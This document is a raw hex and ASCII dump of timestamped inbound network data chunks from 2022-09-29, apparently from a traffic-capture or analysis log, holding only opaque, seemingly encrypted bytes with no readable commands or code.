                                                                                                                                                    2022-09-29 12:59:04 UTC7822INData Raw: 83 4a b1 0d 4b 57 95 b6 c0 cd 00 97 b9 94 72 74 d7 51 2d 8e dd 1d 9e a2 6f a6 8a df 4c a4 19 1a 07 6c c2 c1 67 ae e7 39 c5 73 95 52 a7 0a 4a 73 be 51 dd a8 e5 b7 59 c6 de 80 19 79 c2 8b 83 ef ca 76 48 06 17 bf f1 df 98 05 04 84 b0 78 50 34 54 eb e9 57 63 be 59 15 ab 7a 7f ce 4f 4b 4a 07 f3 3a 84 87 24 30 d9 3e 55 d0 8e ad 1e 0c 2b 9b 18 d2 28 da bd fc 2f 81 70 5c a4 df 19 aa 28 55 60 dd aa 46 c5 13 0a a5 03 2f 45 bd ff 5a c8 92 6e fd 8e 89 10 b1 9e af 7e 0f d4 a9 0c 9f 68 8a dd 19 85 00 35 62 5d ac 7c c9 d0 b0 64 ac 03 89 6f 74 52 c7 4f cf 1e 30 19 22 32 01 6b 4b 0e 2e a0 41 be 93 38 45 9c 76 5d 0e e9 82 83 db b1 1c cc 59 af 16 d7 45 77 61 59 82 9e d0 ff f5 56 7b 56 29 ed af f6 1a 61 be 74 ce f2 09 6d ba f6 ca 50 eb 04 c3 63 50 10 06 13 d5 86 3a 47 b4 31
                                                                                                                                                    Data Ascii: JKWrtQ-oLlg9sRJsQYyvHxP4TWcYzOKJ:$0>U+(/p\(U`F/EZn~h5b]|dotRO0"2kK.A8Ev]YEwaYV{V)atmPcP:G1
                                                                                                                                                    2022-09-29 12:59:04 UTC7838INData Raw: 68 45 08 00 b1 d9 93 89 78 87 4a 41 f0 97 de ab 21 19 16 bd 9c f1 f8 42 48 1a 57 e3 58 08 72 bf 77 9f dc aa 74 36 2f 74 35 80 ad 79 c1 9e 00 4c 2e 36 1b cc 04 7f 15 96 2a 97 63 7e ae c3 7d b2 ce 68 84 59 c6 15 62 b7 44 b9 2e 15 62 b1 20 24 91 c8 84 ff 2b 93 a4 f4 53 1d f7 5a 03 a4 9a 2b 13 af 4e e7 72 46 1a 79 dc 2e 9d 2d ca 04 5e c0 c6 95 b6 78 ba b6 1e 38 0f 40 99 9e d3 be 69 08 30 bb 81 96 77 d4 80 e3 6d 6c 9d 44 fc 90 ee 45 cb ba 16 c2 54 0a ef d2 bb 38 04 33 34 20 b7 87 ed 70 39 74 04 81 ef 3f 65 10 7c 5d a4 08 10 f2 0b f8 f2 51 cd b0 7b b9 f0 e0 e8 33 aa 98 c6 93 e2 44 a2 6b a1 bc f5 ff 71 81 57 99 d6 6f 2c 15 67 9f cb c6 5b 9b 11 71 b4 59 eb a1 7d b5 0e a0 01 32 97 dc 1e 33 d5 c1 d0 a7 57 1e 6d ad 05 a1 0b 25 1f 1c 9c 80 e6 f9 b4 1d d3 24 55 c7 de
                                                                                                                                                    Data Ascii: hExJA!BHWXrwt6/t5yL.6*c~}hYbD.b $+SZ+NrFy.-^x8@i0wmlDET834 p9t?e|]Q{3DkqWo,g[qY}23Wm%$U
                                                                                                                                                    2022-09-29 12:59:04 UTC7854INData Raw: b5 55 33 38 aa 60 cd 53 5a fa fa 5c 76 e0 e7 3c 24 a4 99 79 4d 3f df c7 03 a1 11 7e 10 c5 74 0b 09 79 de 04 55 60 66 66 21 63 11 60 f6 da 84 06 21 b9 d7 b5 1a 7b 1d d2 51 00 53 ef 5f ff 71 cb a5 9d 9d c3 7f 5a 71 79 86 f4 aa dc b2 55 34 8b 1c 48 27 f0 07 0c 66 55 e5 63 ce fb 4d a1 cf 5d d3 ad a0 3f 4e 4a ff 85 a3 e9 ad db e0 4e c0 cd 2f a5 93 f6 af e9 fd ac d2 b4 d7 f9 c5 60 88 ba 17 a3 38 05 b4 1f b8 96 37 62 63 92 77 c7 43 cf 3f 1e 6e 7e 9f d3 eb 57 ea 99 43 83 62 91 01 85 16 5d ff 49 d2 76 62 a4 65 8d ab 7b c6 15 99 99 1a 8d 90 3a fa 97 92 2e 11 cd 14 b1 89 4b 35 d3 3f 2c 5b e1 1d 9d 71 fc 76 90 c2 58 a7 40 e7 6a 2e aa 47 b3 4d 8e 46 e8 d4 6f 1c d6 2d ee 3e c0 b7 96 20 26 ab 12 93 cd 39 f4 44 43 7e 47 6f 63 82 6f 20 6b 8c ae 91 50 d9 eb c9 5d a6 00 ae
                                                                                                                                                    Data Ascii: U38`SZ\v<$yM?~tyU`ff!c`!{QS_qZqyU4H'fUcM]?NJN/`87bcwC?n~WCb]Ivbe{:.K5?,[qvX@j.GMFo-> &9DC~Goco kP]
                                                                                                                                                    2022-09-29 12:59:04 UTC7870INData Raw: b6 81 24 bf 45 49 ed f9 05 e9 6c 3a 6c 52 9a fd 8c 69 42 b8 8e 1a f8 69 b6 05 63 0e a3 5d f1 05 ee 5a bc 12 4d 4f 1d a8 a9 54 6c 71 ca 8a 5c 9d 59 60 a6 2e c3 21 ca 53 28 88 b3 0c 9a 98 33 b3 3f ef cf 31 b5 9a f2 9b 32 fe 08 07 a4 ea b5 43 c3 22 41 87 27 3b 83 64 01 f2 e8 76 f3 60 c3 7f 43 e2 97 05 b8 0c 16 c6 d7 6c 37 b9 69 8b 48 b0 ba d5 ac 9f c2 4d 6b 45 dc 98 82 c2 47 cf 70 e8 b3 c9 00 aa 15 c1 85 3e 71 e4 ba 6a ff 18 b0 08 2a 47 27 48 8a f9 eb be 00 2b 97 40 ad 4e 75 8a 14 62 82 e2 2b 66 ea 83 bb 95 b1 43 10 ac db 3d 67 2f 7a 3b 1e 75 60 92 23 ff 2b 9e 17 3d 73 30 a5 cc ab 67 1c df be 77 8c 41 d6 4e 2f 3c 55 e7 f3 7e b5 20 a7 71 a6 09 b9 2d 77 3b a2 68 09 1b 8c 0b 4f c1 68 8f 8a c1 4c e1 60 44 a2 7f 24 03 bc 7d af 17 20 46 f7 7b 86 33 4f f9 52 74 10
                                                                                                                                                    Data Ascii: $EIl:lRiBic]ZMOTlq\Y`.!S(3?12C"A';dv`Cl7iHMkEGp>qj*G'H+@Nub+fC=g/z;u`#+=s0gwAN/<U~ q-w;hOhL`D$} F{3ORt
                                                                                                                                                    2022-09-29 12:59:04 UTC7886INData Raw: fa ce 58 81 3f cd 7f 9e 01 a5 12 f8 1d 44 d5 ab cf ec fb f9 6e 78 07 c3 fd ec 77 40 40 c9 d6 15 c0 d8 1c c7 f5 86 da 9f 7f 8c d3 ba c9 7a 43 05 6b b0 bb 16 82 ba f6 a1 b7 4b e0 83 21 d8 60 ec ea af 61 18 c1 1c d5 be ac b3 4e 57 f3 6c 4b 2f da c0 4a 8c 7c d4 33 74 3d 7a 5b be c4 80 48 28 3a ed 7f 98 77 6b 32 29 89 c1 d4 38 91 76 96 b2 de 31 cb 3b 5c fe 62 83 55 38 20 c7 0c 66 52 3c be 5c 66 e6 73 3f 93 62 dc 15 ef 0f 1d 90 c0 62 ea 36 1f 1b 33 09 97 7a d3 08 b7 b4 1e d3 64 8f 76 5f 89 36 99 18 7c e1 f3 bc 34 9b f4 19 e9 37 32 d3 d8 e8 a7 ca 4e af bc f7 80 86 ff 80 57 20 35 cf 4a a4 0b 4f 5d 38 23 55 a1 ac e1 ee a0 94 e7 d2 85 ba 33 53 1e 10 12 b5 7c ca aa 06 92 3a 5b 75 ac f1 59 f2 e9 5f 66 99 9b 99 66 d4 e2 6f 57 04 ff f6 1a e3 54 87 57 fb 41 96 ec 0d 76
                                                                                                                                                    Data Ascii: X?Dnxw@@zCkK!`aNWlK/J|3t=z[H(:wk2)8v1;\bU8 fR<\fs?bb63zdv_6|472NW 5JO]8#U3S|:[uY_ffoWTWAv
                                                                                                                                                    2022-09-29 12:59:04 UTC7902INData Raw: 69 4b 49 99 06 b0 e1 f9 f1 b6 83 ec 1b 90 9d e8 f1 f0 68 83 37 60 76 60 d8 74 e4 6d 3e c0 7e bf 06 1f c3 b0 30 ad 68 b6 44 51 54 b5 ca 2f c4 43 bd 00 16 96 8f 26 bc 3c c4 73 a3 cc 00 32 bd 0a 73 5e 3c b8 28 88 41 58 a4 63 30 e6 57 5a 17 8b a6 74 34 65 9c a5 28 2b 94 d8 a4 db ce 82 d7 d9 32 42 0f e0 94 9f 06 0b 75 4c f3 d5 d7 76 1d b5 50 8c ed e6 f8 b0 c8 9d 4f af 6f 39 d3 96 7a 97 a6 83 28 f2 a0 87 c0 d7 f7 5b 28 d0 5a 1a 76 06 03 e3 d5 98 df aa cc d8 99 db b6 bd 75 46 e8 72 50 2a 5a 41 97 60 a6 9f e9 90 dd 80 35 ef cc a7 e7 74 c4 1a 67 8d 38 ef 79 88 a3 ba d4 e0 79 f2 90 87 ac 01 b6 11 b9 fd 92 e9 32 20 4b 19 17 08 73 aa 2d f7 ae 8c 18 8f 9b eb df 47 14 be 83 5e 56 00 c6 1b ce cb 12 d8 4d 0e b9 a9 93 74 f5 29 07 14 31 82 f4 50 f9 f1 2b 54 29 e8 79 97 6c
                                                                                                                                                    Data Ascii: iKIh7`v`tm>~0hDQT/C&<s2s^<(AXc0WZt4e(+2BuLvPOo9z([(ZvuFrP*ZA`5tg8yy2 Ks-G^VMt)1P+T)yl
                                                                                                                                                    2022-09-29 12:59:04 UTC7918INData Raw: 1c a7 67 e6 39 1a 68 1c 42 25 1b 04 0a b6 57 4b c9 e0 c5 82 31 ec b4 d3 a3 5b 55 ed 54 2e f8 1e be 53 ca d6 dd 05 39 8a ab 87 f4 28 4f 37 ad 69 52 5f 0b d7 10 e9 cb e8 99 07 ba d0 e0 6b 2a dd d1 e4 1c a5 09 02 fc 88 66 1b b9 d0 09 57 84 a7 ab 94 97 a1 fc fd fa d4 22 e0 65 b9 6a a6 0a ab 00 67 a6 c3 5b 65 4f f4 3a 51 fb 53 5a 6c e2 7b 9a de b9 16 8b 17 fa 2b 07 04 e6 49 fa ff 9c 6a 19 bd 89 04 4f f3 de 95 59 69 15 21 60 06 ad 71 d1 49 25 a7 9d 90 87 16 8b 48 72 62 87 f2 70 15 91 d8 08 9b 6c 8d 37 d7 d4 53 fd 12 00 a0 6a 23 c8 11 fc a8 60 a0 29 3f 81 c1 2f 2f 49 9e b5 00 55 8e aa 7b e6 42 4e 71 8b c1 5b aa fa f6 dd 30 c4 17 e7 a5 20 b7 56 a6 e1 22 d2 92 82 50 cc b3 e4 24 5d 74 da e1 1a 54 52 be ec 2d 1c f1 1d 2f 4a fd be 4f 3c 22 4e c0 26 66 35 ff 06 4f 40
                                                                                                                                                    Data Ascii: g9hB%WK1[UT.S9(O7iR_k*fW"ejg[eO:QSZl{+IjOYi!`qI%Hrbpl7Sj#`)?//IU{BNq[0 V"P$]tTR-/JO<"N&f5O@
                                                                                                                                                    2022-09-29 12:59:04 UTC7934INData Raw: 38 d9 9f a5 13 0f 01 5a 62 b2 78 8e 03 7c a9 48 b2 17 ba 0b e9 65 82 47 27 56 42 c0 a2 a9 09 88 2e 8a 7c 84 98 2d e4 cb eb 56 79 d4 2d 64 a3 4e 4e 88 bf ba 5f 33 d2 bd 31 85 24 a0 8c af d9 9a 51 40 00 e7 c5 12 84 49 f8 91 50 db 98 cf 2a 98 21 20 b3 47 2f f2 58 19 a1 73 16 c7 41 51 da 43 03 56 a1 90 df 73 20 ac b1 9a 85 5e cc 96 f7 2b 8a dc 38 a3 6b e8 87 ee 68 f0 87 4f b8 2c 3a cc 92 2d 9d b8 f9 29 6f 3e 82 cc 34 f5 02 5a 3c ef 50 80 7e 05 52 af 41 fe 1e a6 9a f6 c2 a7 64 3a b2 d3 f9 8c 92 11 50 82 8b 03 6d 6b e9 0b 3f 1e c2 dc e0 22 33 40 8c dd 17 65 b9 1d 4a 1a f1 60 1e 21 0c c2 56 69 ef 40 0d d5 bb d8 18 7c 5a d3 34 ca f7 dc ae 1c c3 17 81 28 c1 b1 3c 2a 5d cc 9b 40 9f 83 b7 2b d7 42 e1 71 41 1e f3 18 5e bb c6 59 50 cc 2f 57 06 60 93 0b 3c 88 9b 10 9d
                                                                                                                                                    Data Ascii: 8Zbx|HeG'VB.|-Vy-dNN_31$Q@IP*! G/XsAQCVs ^+8khO,:-)o>4Z<P~RAd:Pmk?"3@eJ`!Vi@|Z4(<*]@+BqA^YP/W`<
                                                                                                                                                    2022-09-29 12:59:04 UTC7950INData Raw: 71 79 57 d8 fc 4d dc 0e b3 ac 4d f1 12 d7 5c 79 c3 08 a4 e3 f5 08 e8 ad 30 2a dc 19 da 03 6f 69 a0 ef 92 34 55 71 0b da f2 2e b4 9d c7 55 83 db fb f2 f6 ea 54 8e 6c d3 4c 55 20 aa 9d af 33 a0 f9 19 c8 9f f0 24 97 1d 5b 92 d8 78 11 22 34 cc 49 66 a4 64 23 6d e7 ca d1 f1 07 b1 80 99 5f 80 ba 88 a5 52 34 a2 c2 74 fb 46 a5 0a a0 e1 64 d0 70 2a d0 7c 6f ae b6 a3 27 39 ae 68 b6 2d 54 d6 02 7e 8c 00 bd 06 90 61 52 c5 3d e5 b9 07 7b 23 14 de a4 ff e2 b3 66 c8 d9 61 71 af 76 9d 0b a6 d5 f2 f1 11 fb cf 41 e5 ea 8a 4b 2f 4d 52 c8 e6 4c ea b4 c4 a0 05 e1 5e b3 59 0f a6 05 b6 5a 3c 90 76 86 d7 61 7d d3 1e 64 86 2f 76 19 d6 c3 97 bb 4f 86 46 32 58 08 72 f5 1c 3e 25 e9 c2 49 88 5a 2d 2e ca 31 1e 07 7b 91 78 90 5d 24 4a 08 9c ca d3 21 7a a8 61 2e 7c b0 06 64 dd 3c df b0
                                                                                                                                                    Data Ascii: qyWMM\y0*oi4Uq.UTlLU 3$[x"4Ifd#m_R4tFdp*|o'9h-T~aR={#faqvAK/MRL^YZ<va}d/vOF2Xr>%IZ-.1{x]$J!za.|d<
                                                                                                                                                    2022-09-29 12:59:04 UTC7966INData Raw: 01 9d 58 d6 39 46 25 b6 cf 35 a2 f3 82 7a 75 74 19 58 fe 09 1e 99 cf 0c f7 f3 76 24 8c ad 5c 8d 75 12 e7 9a 68 13 b5 29 75 b3 80 ab f5 e4 82 f0 7f 34 60 8a 07 34 b8 e2 db 90 a6 9e 3c 5b 49 70 9c 44 4d 32 e9 ce a5 32 a2 a1 cb aa e1 4b ea 72 12 93 42 63 2d 93 f8 9f 58 c6 e1 ee 5e fe 88 48 46 d3 6e c7 7c 7e d4 ab 25 84 fd ca f3 6e df dc 6b c0 ae c8 57 09 82 50 d4 2f 55 a8 43 b3 ec 2f 87 e6 fb 9d 49 f9 7c 9e 78 04 70 0b 57 ef d3 d3 51 55 6d 2a 03 7f 59 c4 22 85 f6 4b 81 40 03 db 67 72 4d 92 48 bf 1d 14 e7 94 74 cf b7 8d 1c f3 d1 07 e7 3d af 47 01 e4 48 da 8a 12 3a a0 89 1c 97 21 b7 30 d2 9d 79 78 7e 3d a9 0c a2 1b 76 e5 1b 1b 04 a7 ba ab 25 7f 55 e9 51 55 25 e5 af cb a3 43 e9 b6 4a a0 5d a3 67 51 35 78 43 76 77 07 37 f3 f9 02 25 68 7c 79 8f 2a 22 1f 31 27 ed
                                                                                                                                                    Data Ascii: X9F%5zutXv$\uh)u4`4<[IpDM22KrBc-X^HFn|~%nkWP/UC/I|xpWQUm*Y"K@grMHt=GH:!0yx~=v%UQU%CJ]gQ5xCvw7%h|y*"1'
                                                                                                                                                    2022-09-29 12:59:04 UTC7982INData Raw: fd 33 43 b2 f3 ef 32 49 a8 4e ad 8c 37 1d e1 f3 cb b4 97 b3 ff d7 05 6d 34 bc 5c f1 fe 8f ca f9 c8 da c4 fc fd 02 4a 1a cf 79 b7 7e 49 90 34 46 40 f1 d5 21 bc c3 a9 1a 4c 7b 72 e4 ae 2a cb d6 4b 79 31 c8 73 22 91 05 7f af 0a 48 af 3c 4d c0 f7 e4 93 a8 70 4f f3 42 55 a8 4b 38 96 fa d4 63 f8 51 d0 4a bb cc 88 66 e2 d4 1a e9 70 37 82 dc 1f 84 20 44 ba 7a c9 05 f8 59 3f 88 69 16 1a 6f b3 5e a6 88 c6 b5 e1 4d 81 41 a6 ca f2 ad 30 94 ca 4e 0a 35 11 01 78 ac 54 7c 63 23 40 21 41 a5 08 44 a6 b3 78 86 30 c3 bd 33 43 fa 04 e3 4a 25 a0 ba 29 9a bd de 73 da 6e 5b c0 b8 1f e8 4d 89 77 96 38 d9 87 df ff a6 35 41 ad f1 52 9b e3 4c c9 72 df bb a2 5e 81 4e ce 63 48 2b 94 ce ff c7 57 21 60 de cd d1 cd 53 76 a4 03 25 8d 57 e9 34 8f e0 b1 fd ef b7 ff 68 68 ee f9 d5 e9 85 8d
                                                                                                                                                    Data Ascii: 3C2IN7m4\Jy~I4F@!L{r*Ky1s"H<MpOBUK8cQJfp7 DzY?io^MA0N5xT|c#@!ADx03CJ%)sn[Mw85ARLr^NcH+W!`Sv%W4hh
                                                                                                                                                    2022-09-29 12:59:04 UTC7998INData Raw: 56 28 8b 06 eb 3d c7 68 3a 35 65 33 3b ba 34 8c 81 ab ec 55 10 93 d6 d2 7e e1 fd 04 e9 54 b3 82 2f be cc 5b 0a 63 53 44 76 8e 32 dd d3 22 26 e1 28 05 85 a5 3c e3 c9 7b 69 cd 57 db 2b ce 05 53 0e 91 90 de 7c 44 49 4d 9d 5d e5 a9 7d c6 ac 23 bf 14 36 16 1b a9 35 3c e1 80 83 07 49 20 c2 87 18 7a c4 8f dc 1b 85 2b c0 30 90 1b 0e c0 22 40 2e e9 ce a8 27 43 a4 6e 51 1b 59 95 b1 69 73 2b 70 68 61 66 1e 94 d3 73 b7 0c ff 2e b9 8d 9e c6 74 22 63 77 d4 59 ea 3d db 30 36 c3 ee 3b 02 f0 2f 50 94 45 e6 3e e2 1f 82 2a f3 af 04 c5 69 fd 15 28 c7 cd 1a 4e be aa 59 4b af 64 8c 75 73 b8 af b8 8b 54 4f 17 e0 fa b1 b1 6c 46 8c d9 2a b8 ba c2 ea b2 76 d4 39 df 3e bb 93 63 65 59 6b b4 c9 32 3a a9 c8 d2 ed 4b 76 13 a7 57 83 d7 f0 a9 37 b9 cc 2e e0 28 73 a5 cf 78 57 81 9c 14 a8
                                                                                                                                                    Data Ascii: V(=h:5e3;4U~T/[cSDv2"&(<{iW+S|DIM]}#65<I z+0"@.'CnQYis+phafs.t"cwY=06;/PE>*i(NYKdusTOlF*v9>ceYk2:KvW7.(sxW
                                                                                                                                                    2022-09-29 12:59:04 UTC8014INData Raw: d8 95 9f 5e a6 c1 63 8d 1f 52 86 d3 5c 69 74 16 c7 19 a9 6d 67 0f 4d 4a 7b cb 9e fe 9f ee 96 80 41 19 9f d9 97 43 ab 1f 07 05 5f 5d 51 b5 3b f8 4f e1 fe 8d 5b 8f 9e 47 a9 7d dd 89 89 6b 25 3d ad 4e 17 01 92 d6 a2 00 3b 12 5b dc 35 6f 5b 6e 5c 88 42 f1 4d 14 d9 aa eb 58 d6 b7 b0 07 ee a0 43 9b 16 52 21 56 71 32 57 92 51 33 5e 80 13 f8 60 58 93 30 9f c0 01 5c a7 13 3b a5 ef 65 66 43 74 48 83 40 32 9b 63 e2 f9 14 5f ac c1 ab 18 2d 1a c2 e6 47 fa 9b 8a 7c 46 90 b5 60 d0 57 0a 3e a7 20 08 82 e7 9e 4e 5c b1 5f e7 70 6e a2 ef a0 43 0e 2f 19 e3 54 8b 69 42 2f 49 63 e7 78 4d 29 b5 94 f0 6a bc 44 12 6e 95 9a 63 b1 7b 99 9d 07 ae 9b e2 16 87 ab ad 21 04 2d 41 bf 31 d7 ae 5b d7 a9 49 64 ed 58 ec b6 08 d0 a1 b9 29 ce 47 6e 59 d7 56 c7 38 4a 05 6a 1d 5e 08 be bd cf b1
                                                                                                                                                    Data Ascii: ^cR\itmgMJ{AC_]Q;O[G}k%=N;[5o[n\BMXCR!Vq2WQ3^`X0\;efCtH@2c_-G|F`W> N\_pnC/TiB/IcxM)jDnc{!-A1[IdX)GnYV8Jj^
                                                                                                                                                    2022-09-29 12:59:04 UTC8030INData Raw: 17 f0 fb 71 e7 e1 22 ab d5 d1 d8 a1 08 6c 90 a5 02 8d 58 b1 43 32 6b 5d 00 f3 01 22 d5 b0 3d b3 4e 8e 97 ce 45 b0 b8 95 a2 e5 13 3d 03 2a 1d ba 9a 94 6b 66 db 96 6c 20 e5 4c f7 8e e9 9c 66 a1 2c af d4 0e 29 7c 0d 92 ed 12 18 fb dc 53 b3 25 93 db 6e e6 06 9c a5 69 76 da 96 57 97 65 6e be cc c3 de 89 58 66 8f e2 e2 00 81 d1 be b1 85 fc 49 64 c7 72 11 5e 8b b4 a7 da b2 58 09 eb cc 98 3b 59 a7 b0 7e e3 58 9d b9 2a 64 ec 73 aa c8 fc 9d 89 e8 78 92 80 cd 2d 6f 94 66 ee 04 26 1c d3 11 8c df 03 9e 8b a8 1f d5 60 41 fd 0e b8 ce c5 e7 f1 f3 5f b3 0b 7e 35 8d 7a b5 63 76 79 9c bf 62 2b 8f ef c3 8d 2d 13 42 8c 05 9b c7 7c d6 1f 2e 6a 16 80 c9 fd d6 8d b5 79 e8 4c 6b a4 41 14 07 e4 4b 0e 75 dc 3d 70 61 16 37 d0 10 2e de 0c 05 53 b0 9f c0 54 75 5f ee 34 ee 5f 21 2b 87
                                                                                                                                                    Data Ascii: q"lXC2k]"=NE=*kfl Lf,)|S%nivWenXfIdr^X;Y~X*dsx-of&`A_~5zcvyb+-B|.jyLkAKu=pa7.STu_4_!+
                                                                                                                                                    2022-09-29 12:59:04 UTC8046INData Raw: 6e 54 0a 9c 87 bd d4 d9 a8 b9 36 9f d9 00 9b 3f d3 d9 82 1e 8e 5a 60 32 b6 05 a2 b5 db 09 4d ea 46 36 bc 38 51 fb 55 45 a5 97 12 dd 74 d0 5e 54 d4 24 b2 ef 79 38 65 d7 8f 7e 81 13 a8 32 ec fb 16 a9 64 f9 0f 19 bc a5 48 4e 5d 53 dd 52 8a 4f e2 c4 17 30 90 72 97 ce d5 42 ae 5a 2a c9 35 0a 4e c9 34 d0 5c 0b c9 6b 54 01 e3 4c 57 75 d7 d8 22 2d eb 7d d9 6f e5 77 49 90 5e 0f bb b5 17 4c fe 61 e9 d7 ab 55 a3 37 a6 02 1a 68 98 6e f3 b2 70 05 16 98 be bd 42 3b 40 16 60 f1 b5 ac 37 6a b9 ab c9 8a 53 7a 7d 0a 62 5c 60 ac 1c 8f a6 9c 0a a3 6a c3 71 e6 fe 0a 04 fe cf a1 0d e1 03 19 20 85 52 f2 02 a0 e6 c7 c1 ba 57 09 9d 29 49 ce 9a a5 c3 dc 87 89 c9 5f 06 85 12 46 b2 95 b2 2b f4 68 73 33 f8 13 76 2a 4f c0 45 99 43 6b b5 97 0d 18 9a 0a d3 7f fc 9c 85 cb 07 0f bb 5d ca
                                                                                                                                                    Data Ascii: nT6?Z`2MF68QUEt^T$y8e~2dHN]SRO0rBZ*5N4\kTLWu"-}owI^LaU7hnpB;@`7jSz}b\`jq RW)I_F+hs3v*OECk]
                                                                                                                                                    2022-09-29 12:59:04 UTC8062INData Raw: 00 80 ba 8d 85 21 69 7c 24 d5 15 03 c5 fe 4a 00 45 f7 ff 01 9a aa 04 8e ca 67 99 05 a5 6b 58 0a 49 a4 35 37 f7 84 79 9a d9 b4 0f ba 69 f2 f8 4c 6a 60 fc 91 e3 25 bb af 93 38 83 26 2b 17 54 c6 12 1b 09 c0 6e 42 37 32 fd 99 e8 33 ba e8 c0 ce 1d a3 e3 49 9b 42 b5 2b c8 7d 12 73 53 18 1f e0 be 33 22 df 96 e0 68 1c 0e 74 38 31 35 21 d1 01 14 30 10 00 2d 95 e6 0d 82 56 41 66 38 68 87 bf e3 11 35 0e fc c3 34 33 42 e5 7a aa ff 91 18 85 32 af 5b 17 14 aa 12 18 ac 24 7a 41 d0 5e 1d 6f f2 f3 6a 7c 1b 6a e0 e2 4a 09 1f 59 06 06 de 01 b0 35 c4 78 22 bc 27 ff b9 e0 aa 6a 7a ee 01 b2 61 3e f7 cc 34 bd 29 12 cf 7e 12 b6 8d c5 3d 81 19 9c 5b f0 ed be e7 42 52 2d e0 39 eb 08 26 0c 9f dd bc d3 d1 b6 87 fc 4c 2e e6 90 9c 81 6a bc b1 c3 c8 24 81 78 ae 4a 47 c7 2b 5f de bf f6
                                                                                                                                                    Data Ascii: !i|$JEgkXI57yiLj`%8&+TnB723IB+}sS3"ht815!0-VAf8h543Bz2[$zA^oj|jJY5x"'jza>4)~=[BR-9&L.j$xJG+_
                                                                                                                                                    2022-09-29 12:59:04 UTC8078INData Raw: 01 fc 31 5e 02 3a 3c 45 30 70 b0 8e 76 c8 16 47 bb 31 81 82 6e a5 d0 b1 cb 38 3c 15 1d c1 96 5d 25 16 0e 0e 0d 4f a5 e1 4c 4e 14 c8 d9 5f bb 61 d2 30 5f d5 04 71 90 c6 5f a1 16 ac ee 69 8d c6 8a af ba 8d e8 9c 7e 9b 80 11 73 3b 67 d8 13 75 1a cc 81 39 c5 40 86 27 55 d0 48 4a b1 0e 10 52 ca 92 24 53 16 2c b8 68 98 4f 36 37 97 e1 35 b5 ca 68 db 89 94 8f f3 b4 36 62 51 f6 18 26 3e 6d 7e fc 17 f9 d2 f7 22 b9 d7 9b 75 be a1 cc 16 43 b9 29 26 e2 07 89 bf 28 b2 de be c9 c0 80 07 de 5c e7 5c 81 81 d4 78 35 a6 8e 4b ff e0 bb 99 40 63 6f b6 4b e0 11 1f 87 48 09 cf 0c 2a 1a d7 7f 72 90 74 90 9a 2d a8 af e3 e1 93 35 f3 90 57 4b a2 2a 07 02 81 38 6c 98 c0 ee 9d 5f b1 99 f7 b4 e7 90 03 92 0e 16 a9 af b7 03 9c ed 7b d0 a3 03 6c 0c 77 6b b7 bc ce 14 03 03 93 65 b8 e7 d8
                                                                                                                                                    Data Ascii: 1^:<E0pvG1n8<]%OLN_a0_q_i~s;gu9@'UHJR$S,hO675h6bQ&>m~"uC)&(\\x5K@coKH*rt-5WK*8l_{lwke
                                                                                                                                                    2022-09-29 12:59:04 UTC8094INData Raw: 7f 78 25 81 6c 3c 2c 12 24 7a 61 fe 83 e0 eb 59 e7 8a c7 9b 6f 90 b1 34 e1 26 7b 3b 75 9c 6e 6a 21 a9 3b 39 b6 d2 d2 ea 0f f6 77 05 b3 e6 05 d2 24 0a d9 4c 21 d2 62 83 04 e9 a6 5d 9a 3f 41 a2 0a 6c a4 49 4e 4c 9c 77 54 79 f8 6f 2c cf ac d6 47 83 7f e0 7f 1a 71 92 4c be 51 5b a8 5a 98 77 00 19 f3 ab 97 d5 a6 d2 6d 8d ed 9c 33 f6 c5 29 4c 0d 1d 4b 0e 45 0e 9b 8c e8 6b 92 b7 c7 97 30 b6 6f 80 82 6b 63 f7 d7 3d 64 fa a2 fa 46 86 36 2b 37 92 9f 43 6f e7 85 86 72 38 fd 3b 65 51 65 06 fe 1a e2 32 18 10 c6 90 19 3d f5 4d 4a bf 5c 3a 5d 09 6e 75 33 28 05 9e b2 f3 57 4e da f1 0a 9f 2a 57 6f 07 bb 90 8f 51 6c ca c1 aa 0b 41 05 5e 12 a0 f4 65 10 92 b3 4e 95 e0 cc 77 80 13 ef 9b 7b bb ba 01 72 d9 e6 f4 18 9c 00 a8 ef cf a5 1f f5 8a ed 85 a0 da ad b7 0d 27 a5 1e 5b 53
                                                                                                                                                    Data Ascii: x%l<,$zaYo4&{;unj!;9w$L!b]?AlINLwTyo,GqLQ[Zwm3)LKEk0okc=dF6+7Cor8;eQe2=MJ\:]nu3(WN*WoQlA^eNw{r'[S
                                                                                                                                                    2022-09-29 12:59:04 UTC8110INData Raw: e0 8c bf 5d 72 51 5e 10 6e 5b 1f 6d 0a e9 f2 f7 b5 1f 51 00 80 d0 66 11 74 34 1d 16 21 3e c7 7b 9c 31 6c 7e 40 e0 19 c8 cc fc b7 f0 41 07 57 32 81 94 b3 e1 74 35 f4 b6 8b 10 8d 88 3d bf 2d 92 c7 69 a0 b1 f3 17 af 18 a7 82 6b aa 87 22 4c a1 53 15 ae c2 ab 28 c3 e2 03 69 b3 28 4b cb 23 10 cd 9a de a5 5a 14 1b 30 77 9d cf a0 53 83 7f 80 19 b5 db 46 05 17 23 7d 86 95 43 69 6f 78 be c9 49 f5 c3 91 d5 a1 77 fe 44 d7 55 80 3d 43 5d 10 fc 14 6b 36 1c 6e 4b d0 dd a1 ce 99 08 47 12 e8 43 aa 99 26 6d 9c d9 4d 5a a0 8a 0c c7 90 2f 6e 40 52 cc f4 b9 ba ff 09 95 69 bf 9b 51 0e 72 91 b4 4c a9 24 21 ea bb 0e e8 13 b6 2e 1a e5 95 d7 63 29 12 74 4d 1f d6 4a 5c c9 ff 2a 75 80 df 0b 22 11 01 cc 5b d8 1a ec 8b c3 10 c3 a6 0d c4 5f 18 bf 03 e7 4b 01 34 6a 70 22 f9 57 2c 1c e2
                                                                                                                                                    Data Ascii: ]rQ^n[mQft4!>{1l~@AW2t5=-ik"LS(i(K#Z0wSF#}CioxIwDU=C]k6nKGC&mMZ/n@RiQrL$!.c)tMJ\*u"[_K4jp"W,
